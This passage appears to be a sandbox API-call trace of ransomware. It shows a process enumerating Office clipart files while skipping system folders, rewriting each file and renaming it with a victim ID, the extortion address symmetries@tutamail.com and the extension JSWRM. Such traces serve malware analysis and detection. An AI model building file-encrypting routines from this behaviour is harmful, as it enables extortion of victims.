lpOverlapped=0x0) returned 1 [0081.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0081.205] CloseHandle (hObject=0x314) returned 1 [0081.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0081.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0081.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0081.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0081.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0081.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0081.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.206] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0081.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0081.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0081.207] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4fdc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105410.WMF", cAlternateFileName="")) returned 1 [0081.207] lstrcmpiW (lpString1="J0105410.WMF", lpString2=".") returned 1 [0081.207] lstrcmpiW (lpString1="J0105410.WMF", lpString2="..") returned 1 [0081.207] lstrcmpiW (lpString1="J0105410.WMF", lpString2="...") returned 1 [0081.207] lstrcmpiW (lpString1="J0105410.WMF", lpString2="windows") returned -1 [0081.207] lstrcmpiW (lpString1="J0105410.WMF", lpString2="recovery") returned -1 [0081.207] lstrcmpiW (lpString1="J0105410.WMF", lpString2="perflogs") returned -1 [0081.207] lstrcmpiW (lpString1="J0105410.WMF", lpString2="documents and settings") returned 1 [0081.207] lstrcmpiW (lpString1="J0105410.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.207] lstrcmpiW (lpString1="J0105410.WMF", lpString2="system volume information") returned -1 [0081.207] lstrcmpiW (lpString1="J0105410.WMF", lpString2="msocache") returned -1 [0081.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0081.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105410.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105410.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105410.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0081.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0081.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105410.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105410.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105410.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0081.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0081.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0081.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0081.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.208] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20444) returned 1 [0081.208] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4fd0) returned 0x24d210 [0081.208] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4fd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4fd0, lpOverlapped=0x0) returned 1 [0081.211] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.211] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4fd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4fd0, lpOverlapped=0x0) returned 1 [0081.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.211] CloseHandle (hObject=0x314) returned 1 [0081.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0081.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0081.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0081.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0081.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0081.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0081.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.211] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0081.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0081.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0081.212] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105412.WMF", cAlternateFileName="")) returned 1 [0081.212] lstrcmpiW (lpString1="J0105412.WMF", lpString2=".") returned 1 [0081.212] lstrcmpiW (lpString1="J0105412.WMF", lpString2="..") returned 1 [0081.212] lstrcmpiW (lpString1="J0105412.WMF", lpString2="...") returned 1 [0081.212] lstrcmpiW (lpString1="J0105412.WMF", lpString2="windows") returned -1 [0081.212] lstrcmpiW (lpString1="J0105412.WMF", lpString2="recovery") returned -1 [0081.212] lstrcmpiW (lpString1="J0105412.WMF", lpString2="perflogs") returned -1 [0081.212] lstrcmpiW (lpString1="J0105412.WMF", lpString2="documents and settings") returned 1 [0081.212] lstrcmpiW (lpString1="J0105412.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.212] lstrcmpiW (lpString1="J0105412.WMF", lpString2="system volume information") returned -1 [0081.212] lstrcmpiW (lpString1="J0105412.WMF", lpString2="msocache") returned -1 [0081.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0081.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105412.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105412.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105412.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0081.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0081.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105412.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105412.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105412.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0081.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0081.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0081.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0081.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.214] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9400) returned 1 [0081.214] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x24b0) returned 0x24d210 [0081.214] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x24b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x24b0, lpOverlapped=0x0) returned 1 [0081.216] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.216] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x24b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x24b0, lpOverlapped=0x0) returned 1 [0081.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.216] CloseHandle (hObject=0x314) returned 1 [0081.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0081.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0081.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0081.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0081.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0081.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0081.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.216] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0081.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0081.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0081.217] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1864, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105414.WMF", cAlternateFileName="")) returned 1 [0081.217] lstrcmpiW (lpString1="J0105414.WMF", lpString2=".") returned 1 [0081.217] lstrcmpiW (lpString1="J0105414.WMF", lpString2="..") returned 1 [0081.217] lstrcmpiW (lpString1="J0105414.WMF", lpString2="...") returned 1 [0081.217] lstrcmpiW (lpString1="J0105414.WMF", lpString2="windows") returned -1 [0081.217] lstrcmpiW (lpString1="J0105414.WMF", lpString2="recovery") returned -1 [0081.217] lstrcmpiW (lpString1="J0105414.WMF", lpString2="perflogs") returned -1 [0081.217] lstrcmpiW (lpString1="J0105414.WMF", lpString2="documents and settings") returned 1 [0081.217] lstrcmpiW (lpString1="J0105414.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.217] lstrcmpiW (lpString1="J0105414.WMF", lpString2="system volume information") returned -1 [0081.218] lstrcmpiW (lpString1="J0105414.WMF", lpString2="msocache") returned -1 [0081.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0081.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105414.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105414.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105414.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0081.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0081.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105414.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105414.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105414.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0081.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0081.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0081.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0081.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.218] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6244) returned 1 [0081.218] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1860) returned 0x205850 [0081.218] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1860, lpOverlapped=0x0) returned 1 [0081.462] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.462] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1860, lpOverlapped=0x0) returned 1 [0081.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.462] CloseHandle (hObject=0x314) returned 1 [0081.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0081.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0081.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0081.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0081.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0081.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0081.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.463] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf"), 